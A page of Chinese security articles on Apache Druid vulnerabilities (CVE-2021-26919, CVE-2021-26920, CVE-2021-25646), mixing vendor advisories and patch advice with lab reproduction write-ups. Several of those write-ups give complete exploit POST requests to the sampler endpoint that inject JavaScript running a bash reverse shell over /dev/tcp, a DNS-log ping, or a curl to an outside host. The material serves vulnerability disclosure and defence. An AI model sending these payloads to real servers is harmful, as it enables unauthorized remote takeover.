【通告更新】奇安信CERT已验证,利用条件较高,产品已支持防护Apache Druid 远程代码执行漏洞安全风险通告第二次更新 安全漏洞

【通告更新】奇安信CERT已验证,利用条件较高,产品已支持防护Apache Druid 远程代码执行漏洞安全风险通告第二次更新

奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。风险通告近日,奇安信CERT监测到Apache Druid官方发布安全更新,修复了 CVE-2021-26919 Apache Druid 远程代码执行漏洞。由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。且经过奇安信CERT验证,漏洞仍影响官方发布最新版本0.20.2,需要用户手动开启防护措施。鉴于此漏洞影响较大,建议客户尽快自查修复。此次更新新增内容:更新了漏洞定级新增了修改配置的缓解措施新增产品线解决方案当前漏洞状态细节是否公开PoC状态EXP状态在野利用否未知未知未知漏洞描述Druid是一个开源的分布式数据存储,旨在商业智能(在线分析处理,OLAP)的事件数据查询。Druid提供了低延迟(实时)数据提取,灵活的数据浏览和快速的数据聚合。Druid默认使用内置的Derby元数据存储,但是官方推荐生产环境中使用MySQL或PostgreSQL。且漏洞触发需要存在漏洞利用所必须的mysql-connector-java 版本,漏洞利用存在一定限制。值得注意一点是,在官方发布的最新版本(0.20.2)默认情况下漏洞仍旧可以成功利用,需要用户手动增加druid.access.jdbc.allowedProperties等配置参数来限制JDBC链接 (详细修复方案见处置建议章节)。奇安信CERT已第一时间复现该漏洞,复现截图如下:风险等级奇安信 CERT风险评级为:中危风险等级:蓝色(一般事件)影响范围Apache Druid < 0.20.2处置建议1、请参考以下链接尽快升级至安全版本(Apache Druid 0.20.2):https://github.com/apache/druid/releases/tag/druid-0.20.22、缓解措施(添加授权认证):引入 druid-basic-security 扩展 druid.extensions.loadList=配置 Authenticator , Escalator , Authorizerdruid.auth.authenticatorChain=        druid.escalator.type=basic        druid.auth.authorizers=更多详情请参照:https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html3、缓解措施(修改配置):根据自身业务情况在配置文件中增加druid.access.jdbc.enforceAllowedProperties、 druid.access.jdbc.allowedProperties、druid.access.jdbc.allowUnknownJdbcUrlFormat等属性来限制JDBC连接更多详情请参照:https://druid.apache.org/docs/latest/configuration/index.html#ingestion-security-configuration产品解决方案奇安信网神网络数据传感器系统产品检测方案奇安信网神网络数据传感器(NDS5000/7000/9000 系列)产品,已具备该漏洞的检测能力。规则 ID 为:6323,建议用户尽快升级检测规则库至2104021722 以后版本并启用该检测规则。奇安信开源卫士已更新奇安信开源卫士 20210402. 646 版本已支持对 Apache Druid 远程代码执行漏洞(CVE-2021-26919)的检测。奇安信网站应用安全云防护系统已更新防护特征库奇安信网神网站应用安全云防护系统已全局更新所有云端防护节点的防护规则,支持对 Apache Druid 远程代码执行漏洞(CVE-2021-26919)的防护。奇安信天眼产品解决方案奇安信天眼新一代威胁感知系统在第一时间加入了该漏洞的检测规则,请将规则包升级到 3.0.0402.12724 上版本。规则名称:Apache Druid 远程代码执行漏洞(CVE-2021-26919),规则 ID:0x10020C2B。奇安信天眼流量探针(传感器)升级方法:系统配置->设备升级->规则升级,选择“网络升级”或“本地升级”。参考资料https://github.com/apache/druid/releases/tag/druid-0.20.2时间线2021年3月30日,奇安信 CERT发布安全风险通告2021年4月2日,奇安信CERT发布安全风险通告第二次更新点击阅读原文到奇安信NOX-安全监测平台查询更多漏洞详情奇安信CERT长期招募安全研究员↓ ↓ ↓ 向下滑动图片了解更多↓ ↓ ↓ 本文始发于微信公众号(奇安信 CERT):【通告更新】奇安信CERT已验证,利用条件较高,产品已支持防护Apache Druid 远程代码执行漏洞安全风险通告第二次更新
阅读全文
天融信关于Apache Druid 远程代码执行漏洞风险提示 安全漏洞

天融信关于Apache Druid 远程代码执行漏洞风险提示

0x00背景介绍3月30日,天融信阿尔法实验室监测到Apache Druid官方发布安全更新,修复了编号为CVE-2021-26919的远程代码执行漏洞。该漏洞危害较大,Apache Druid官方建议用户尽快更新至安全版本。0x01漏洞描述Apache Druid 默认配置下缺乏授权认证,攻击者可以通过构造恶意请求,从而在服务器上执行任意代码,进而控制服务器。0x02漏洞编号CVE-2021-269190x03漏洞等级高危0x04受影响版本Apache Druid < 0.20.20x05修复建议Apache Druid官方已更新安全版本,建议用户更新至安全版本,下载链接如下https://github.com/apache/druid/releases/tag/druid-0.20.20x06支持热线天融信公司后续将积极为用户提供技术支持,进行持续跟踪并及时通报进展,如有需要请拨打7 x 24小时客服联系电话:400-777-0777。0x07声明天融信阿尔法实验室拥有对此公告的修改和解释权,如欲转载,必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果,均由使用者本人负责,天融信阿尔法实验室不为此承担任何责任。天融信阿尔法实验室成立于2011年,一直以来,阿尔法实验室秉承“攻防一体”的理念,汇聚众多专业技术研究人员,从事攻防技术研究,在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队,阿尔法实验室精湛的专业技术水平、丰富的排异经验,为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。天融信阿尔法实验室长按二维码关注我们 本文始发于微信公众号(天融信阿尔法实验室):天融信关于Apache Druid 远程代码执行漏洞风险提示
阅读全文
Apache Druid 0.20.0远程命令执行漏洞 安全漏洞

Apache Druid 0.20.0远程命令执行漏洞

点击上方「蓝色微信名」可快速关注Apache Druid 0.20.0远程命令执行漏洞完整标题 Apache Druid 0.20.0远程命令执行漏洞 添加日期 2021年4月27日类别 远程攻击风险  描述 Apache Druid能够执行嵌入在各种类型的请求中的用户提供的JavaScript代码。但是,默认情况下该功能处于禁用状态。在0.20.1之前的Druid版本中,经过身份验证的用户可以发送特制请求,该请求既可以启用JavaScript代码执行功能,也可以一次执行所有提供的代码,从而允许在服务器上以Druid的特权执行代码。服务器进程。更重要的是,默认情况下未在Apache Druid中启用身份验证。CVE CVE-2021-25646漏洞利用https://0day.today/exploit/36159 本文始发于微信公众号(Ots安全):Apache Druid 0.20.0远程命令执行漏洞
阅读全文
【漏洞预警】Apache Druid 远程代码执行漏洞 (CVE-2021-26919) 安全漏洞

【漏洞预警】Apache Druid 远程代码执行漏洞 (CVE-2021-26919)

2021年3月30日,Apache Druid官方发布安全更新,修复了由蚂蚁安全非攻实验室 @fantasyC4t 上报的 CVE-2021-26919 Apache Druid 远程代码执行漏洞。01漏洞描述Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。2021年3月30日,Apache Druid官方发布安全更新,修复了 CVE-2021-26919 Apache Druid 远程代码执行漏洞。由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器,风险极大,阿里云应急响应中心提醒 Apache Druid 用户尽快排查服务器是否受影响并采取安全措施阻止漏洞攻击。02漏洞评分高危030303影响版本Apache Druid < 0.20.204安全版本Apache Druid 0.20.205安全建议1、升级至安全版本及其以上。2、为Apache Druid 增加授权。3、利用阿里云安全组功能,设置Apache Druid仅对可信地址开放。06相关链接https://github.com/apache/druid/releases/tag/druid-0.20.207安全产品安全产品解决方案云盾WAF已可防护该类漏洞,并提供7天免费漏洞应急服务,为 您争取漏洞修复时间,应急开通地址:https://c.tb.cn/I3.XzCtR阿里云云安全中心应急漏洞模块已支持对该漏洞一键检测阿里云云防火墙 已可以防御此攻击          本文始发于微信公众号(阿里云应急响应):【漏洞预警】Apache Druid 远程代码执行漏洞 (CVE-2021-26919)
阅读全文
【漏洞通告】Apache Druid 文件读取漏洞 CVE-2021-26920 安全漏洞

【漏洞通告】Apache Druid 文件读取漏洞 CVE-2021-26920

、漏洞名称 : Apache Druid 文件读取漏洞组件名称 : Apache Druid影响范围 : Apache Druid < 0.21.0漏洞类型 : 文件读取利用条件 :1、用户认证:否2、触发方式:远程综合评价 :<综合评定利用难度>:容易,无需授权即可文件读取。<综合评定威胁等级>:低危,能造成敏感信息泄露。 漏洞分析 1 组件介绍    Apache Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。Druid 还支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中使用。2 漏洞描述   近日,深信服安全团队监测到一则Apache Druid组件存在文件读取漏洞的信息,漏洞编号:CVE-2021-29620,漏洞威胁等级:低危。   该漏洞是由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。 漏洞复现 搭建Apache Druid组件0.20.1版本环境,复现该漏洞,效果如下: 影响范围     可能受漏洞影响的资产广泛分布于世界各地,主要集中在美国、中国、印度等国家,国内主要集中在浙江、北京等地。    目前受影响的Apache Druid版本:Apache Druid < 0.21.0 解决方案 1 如何检测组件系统版本打开网站控制台首页,然后在Status中即可查看组件版本2 官方修复建议用户可以通过升级到 0.21.0 或更高版本来避免该问题。下载链接如下: https://druid.apache.org/downloads.html3 深信服解决方案【深信服下一代防火墙】可防御此漏洞, 建议用户将深信服下一代防火墙开启 IPS 防护策略,并更新最新安全防护规则,即可轻松抵御此高危风险。【深信服安全感知平台】结合云端实时热点高危/紧急漏洞信息,可快速检出业务场景下的该漏洞,并可联动【深信服下一代防火墙等产品】实现对攻击者IP的封堵。【深信服安全云眼】预计2021年7月7日,完成检测更新,对所有用户网站探测,保障用户安全。不清楚自身业务是否存在漏洞的用户,可注册信服云眼账号,获取30天免费安全体验。注册地址:http://saas.sangfor.com.cn【深信服云镜】预计2021年7月7日,完成检测能力的发布,部署了云镜的用户可以通过升级来快速检测网络中是否受该高危风险影响,避免被攻击者利用。离线使用云镜的用户需要下载离线更新包来获得漏洞检测能力,可以连接云端升级的用户可自动获得漏洞检测能力。 时间轴 2021/7/2  深信服监测到Apache Druid文件读取漏洞攻击信息。 2021/7/5  深信服千里目安全实验室分析并复现此漏洞,并发布漏洞通告和深信服产品解决方案。点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。深信服千里目安全实验室深信服科技旗下安全实验室,致力于网络安全攻防技术的研究和积累,深度洞察未知网络安全威胁,解读前沿安全技术。● 扫码关注我们 本文始发于微信公众号(深信服千里目安全实验室):【漏洞通告】Apache Druid 文件读取漏洞 CVE-2021-26920
阅读全文
Apache Druid 命令执行漏洞(CVE-2021-25646)复现 安全文章

Apache Druid 命令执行漏洞(CVE-2021-25646)复现

Apache Druid 命令执行漏洞(CVE-2021-25646)一、漏洞描述Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。二、影响版本Apache Druid < 0.20.1三、漏洞环境&漏洞复现Docker环境:docker pull fokkodriesprong/docker-druid docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid启动访问:漏洞复现:POC:POST /druid/indexer/v1/sampler HTTP/1.1Host: ip:protUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/jsonContent-Length: 1045Connection: close{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2020-12-12T12:10:21.040Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": , "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c [email protected]|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}1、DNSlog:DNS记录:具体数据包:POST /druid/indexer/v1/sampler HTTP/1.1Host: 127.0.0.1:8888User-Agent:...
阅读全文
Apache Druid 远程代码执行漏洞 CVE-2021-25646 安全漏洞

Apache Druid 远程代码执行漏洞 CVE-2021-25646

点击蓝字关注我们声明本文作者:PeiQi本文字数:1713阅读时长:10min附件/链接:点击查看原文下载声明:请勿用作违法用途,否则后果自负本文属于WgpSec原创奖励计划,未经许可禁止转载前言一、漏洞描述Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码二、漏洞影响Apache Druid < 0.20.1三、漏洞复现这里使用Docker来搭建环境Docker下载链接: https://github.com/apache/druid/archive/druid-0.20.0.zip下载之后进入目录 distributiondocker执行命令编译 docker-compose up -d访问 http://xxx.xxx.xxx.xxx:8888正常就行了漏洞原理: https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiwPOC请求包POST /druid/indexer/v1/sampler HTTP/1.1Host: xxx.xxx.xxx.xxx:8888User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/jsonContent-Length: 995Connection: close{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": , "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping xxxxx.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}注意请求中这个位置改为你的dnslog平台地址java.lang.Runtime.getRuntime().exec('ping -c 4 xxxxx.dnslog.cn')发送请求即可命令执行看了下可能大部分都是docker搭建,而里面大部分命令是不存在的,但是发现docker里面居然默认是有 NC 命令的,那我们就可以用nc反弹一个shell了反弹shell请求包POST /druid/indexer/v1/sampler HTTP/1.1Host: xxx.xxx.xxx.xxx:8888User-Agent: Mozilla/5.0 (Macintosh; Intel...
阅读全文
Apache Druid RCE(CVE-2021-25646)复现 安全文章

Apache Druid RCE(CVE-2021-25646)复现

漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 影响版本 Apache Druid < 0.20.1 环境搭建 这里使用docker来搭建拉取镜像并启动Apache Druid:0.16.0版本的环境docker pull fokkodriesprong/docker-druiddocker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid访问your-ip:8888即可看到页面 漏洞复现 点击Load data -> Local disk依次填入Base directory:quickstart/tutorial/File filter:wikiticker-2015-09-12-sampled.json.gz默认next到filter项抓包修改filter为{ "type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c [email protected]|bash 0 echo bash -i >&/dev/tcp/192.168.204.138/6666 0>&1')}", "dimension":"added", "":{ "enabled":"true" }}然后发送POST数据包POST /druid/indexer/v1/sampler?for=schema HTTP/1.1Host: 192.168.204.138:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 1018Origin: http://192.168.204.138:8888Connection: closeReferer: http://192.168.204.138:8888/unified-console.html{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":,"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c [email protected]|bash 0 echo bash -i >&/dev/tcp/192.168.204.138/6666 0>&1')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}成功反弹shell 修复建议 升级到安全版本 本文始发于微信公众号(锋刃科技):Apache Druid RCE(CVE-2021-25646)复现
阅读全文
Apache Druid远程代码执行漏洞(CVE-2021-25646) 安全漏洞

Apache Druid远程代码执行漏洞(CVE-2021-25646)

0x00 漏洞概述CVE   IDCVE-2021-25646时   间2021-02-01类   型RCE等   级高危远程利用是影响范围Apache Druid <= 0.20.00x01 漏洞详情 Apache Druid是专为大数据集的快速切片分析(OLAP查询)而设计的高性能实时分析数据库。2021年01月30日,Apache官方发布安全公告,公开了Druid中的一个远程代码执行漏洞(CVE-2021-25646)。Apache Druid能够执行嵌入在各种类型的请求中的用户提供的JavaScript代码,默认情况下该功能是禁用的。但在Druid 0.20.0及之前的版本中,不管该功能是否启用,经过认证的用户可以发送恶意请求来使Druid强制运行该请求中的JavaScript代码,成功利用此漏洞的攻击者可以利用Druid权限在目标系统上执行代码。  0x02 处置建议目前该漏洞已被修复,建议升级至Druid0.20.1。下载链接:http://druid.apache.org/downloads.html  0x03 参考链接http://mail-archives.apache.org/mod_mbox/www-announce/202101.mbox/%[email protected].com%3Ehttps://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3Ehttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646 0x04 时间线2021-01-30  Apache发布安全公告2021-02-01  VSRC发布安全通告 0x05 附录 CVSS评分标准官网:http://www.first.org/cvss/ 本文始发于微信公众号(维他命安全):Apache Druid远程代码执行漏洞(CVE-2021-25646)
阅读全文
【更新】Apache Druid 远程代码执行漏洞 (CVE-2021-25646) 安全漏洞

【更新】Apache Druid 远程代码执行漏洞 (CVE-2021-25646)

漏洞名称 : Apache Druid 远程代码执行漏洞  CVE-2021-25646组件名称 : Apache Druid威胁等级 : 高危影响范围 : Apache Druid < 0.20.1漏洞类型 : 远程代码执行利用条件 : 1、用户认证:不需要用户认证2、触发方式:远程造成后果 : 攻击者通过精心构造的恶意请求执行任意代码,控制服务器。 漏洞分析 1 组件介绍Apache Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。Druid 还支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中使用。2 漏洞描述2021年2月1日,深信服安全团队监测到一则Apache Druid组件存在远程代码执行漏洞的信息,漏洞编号:CVE-2021-25646,漏洞危害:高危。该漏洞是由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。3 漏洞复现搭建Apache Druid组件0.20.0版本环境,复现该漏洞,效果如下: 影响范围 Apache Druid 是为大型数据集上的高性能片断分析(“OLAP”查询)设计的数据存储,Druid通常用作为GUI分析应用程序提供动力的数据存储,或者用作需要快速聚合的高并发API的后端。全球共计3万多台存货主机,中国地区存活主机占比10%,主要集中在北京、广东、上海等地区。Apache Druid因其强大的功能常用于点击流分析(web和移动分析)、网络遥测分析(网络性能监控)、服务器指标存储、供应链分析(制造指标)、应用程序性能度量、数字营销/广告分析、商业智能/联机分析处理等重要场景。目前受影响的Apache Druid版本:Apache Druid < 0.20.1 解决方案 1 官方修复建议当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下:https://github.com/apache/druid/releases/tag/druid-0.20.12 深信服解决方案【深信服下一代防火墙】可轻松防御此漏洞, 建议部署深信服下一代防火墙的用户更新至最新的安全防护规则,可轻松抵御此高危风险。【深信服云盾】已第一时间从云端自动更新防护规则,云盾用户无需操作,即可轻松、快速防御此高危风险。【深信服安全感知平台】可检测利用该漏洞的攻击,实时告警,并可联动【深信服下一代防火墙等产品】实现对攻击者ip的封堵。【深信服安全运营服务】深信服云端安全专家提供7*24小时持续的安全运营服务。在漏洞爆发之初,云端安全专家即对客户的网络环境进行漏洞扫描,保障第一时间检查客户的主机是否存在此漏洞。对存在漏洞的用户,检查并更新了客户防护设备的策略,确保客户防护设备可以防御此漏洞风险。【深信服安全云眼】在漏洞爆发之初,已完成检测更新,对所有用户网站探测,保障用户安全。不清楚自身业务是否存在漏洞的用户,可注册信服云眼账号,获取30天免费安全体验。注册地址:http://saas.sangfor.com.cn【深信服云镜】在漏洞爆发第一时间即完成检测能力的发布,部署云端版云镜的用户只需选择紧急漏洞检测,即可轻松、快速检测此高危风险。部署离线版云镜的用户需要下载离线更新包来获取该漏洞的检测能力。 时间轴 2021/1/27 Apache Druid 官方发布安全公告。2021/2/1  深信服千里目安全实验室监测到Apache Druid漏洞攻击信息并发布漏洞通告。2021/2/2  深信服千里目安全实验室复现该漏洞、发布解决方案。点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。深信服千里目安全实验室深信服科技旗下安全实验室,致力于网络安全攻防技术的研究和积累,深度洞察未知网络安全威胁,解读前沿安全技术。● 扫码关注我们 本文始发于微信公众号(深信服千里目安全实验室):【更新】Apache Druid 远程代码执行漏洞 (CVE-2021-25646)
阅读全文
Apache druid未授权命令执行漏洞复现 安全文章

Apache druid未授权命令执行漏洞复现

喜欢就关注我吧,订阅更多最新消息简介Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。涉及知识点-网络安全事件 https://www.hetianlab.com/cour.do?w=1&c=C172.19.104.182015010409302300001&pk_campaign=weixin-wemedia        “网络安全事件”这门课程是由一些影响比较大的安全事件所模拟的测试环境组成。此课程不仅会添加以往的安全事件,而且还会紧跟时事,去添加最新的安全事件。让大家在第一时间了解,并懂得怎么去保护自身安全为目的。概述由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。CVE编号CVE-2021-25646影响版本Apache Druid < 0.20.1环境搭建这里使用0.2.0版本进行复现,下载地址:https://archive.apache.org/dist/druid/0.20.0/apache-druid-0.20.0-bin.tar.gz下载后执行以下命令解压并启动漏洞环境。tar -xzvf apache-druid-0.20.0-bin.tar.gzcd apache-druid-0.20.0./bin/start-micro-quickstart启动后服务绑定在8888端口,浏览器可以正常访问则表示环境启动成功漏洞复现设置代理后选择load data,抓取到以下包包内容:构造payload执行命令,这里做一个反弹shell的操作POST /druid/indexer/v1/sampler HTTP/1.1Host: 192.168.74.148:8888Content-Length: 1043Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.56Content-Type: application/json;charset=UTF-8Origin: http://192.168.74.148:8888Referer: http://192.168.74.148:8888/unified-console.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7,en-US;q=0.6Connection: close{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2020-12-12T12:10:21.040Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": , "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c [email protected]|bash 0 echo bash -i >&/dev/tcp/xxx.xxx.xxx.xx/1234 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}漏洞修复升级Apache Druid至0.20.1及以上版本参考链接https://f5.pm/go-57059.html2/3欢迎投稿至邮箱:[email protected]重金悬赏 | 原创投稿涨稿费啦!有才能的你快来投稿吧!快戳“阅读原文”做靶场练习...
阅读全文
CVE-2021-25646:Apache Druid RCE复现 安全文章

CVE-2021-25646:Apache Druid RCE复现

上方蓝色字体关注我们,一起学安全!作者:[email protected] Sec本文字数:997阅读时长:2~3min声明:请勿用作违法用途,否则后果自负0x01 简介Druid不仅是一个数据库连接池,还包含一个ProxyDriver、一系列内置的JDBC组件库、一个SQL Parser。支持所有JDBC兼容的数据库,包括Oracle、MySql、Derby、Postgresql、SQL Server、H2等。0x02 漏洞概述编号:CVE-2021-25646Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。0x03 影响版本Apache Druid < 0.20.10x04 环境搭建Apache Druid:0.16.0参考现有的低版本druiddocker pull fokkodriesprong/docker-druiddocker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid0x05 漏洞复现访问8888端口,进入Druid console点击Load data -> Local disk填入Base directory:quickstart/tutorial/File filter:wikiticker-2015-09-12-sampled.json.gz一直点击next到filter项(设置步骤可参考:https://druid.apache.org/docs/latest/tutorials/index.html)抓包修改filter为{ "type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('curl ip:8000')}", "dimension":"added", "":{ "enabled":"true" }}对应post包为(执行的命令:curl ip:8000)POST /druid/indexer/v1/sampler?for=filter HTTP/1.1Host: tls.com:8888User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 623Origin: http://tls.com:8888Connection: closeReferer: http://tls.com:8888/unified-console.html{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":,"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('curl yourip:8000')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}0x07 修复方式升级Apache Druid 到最新的版本对Apache Druid进行权限控制,只允许受信任的主机访问集群服务器参考链接:https://github.com/Fokko/docker-druidhttps://druid.apache.org/docs/latest/tutorials/index.html阅读原文看更多复现文章Timeline Sec 团队安全路上,与你并肩前行 本文始发于微信公众号(Timeline Sec):CVE-2021-25646:Apache Druid RCE复现
阅读全文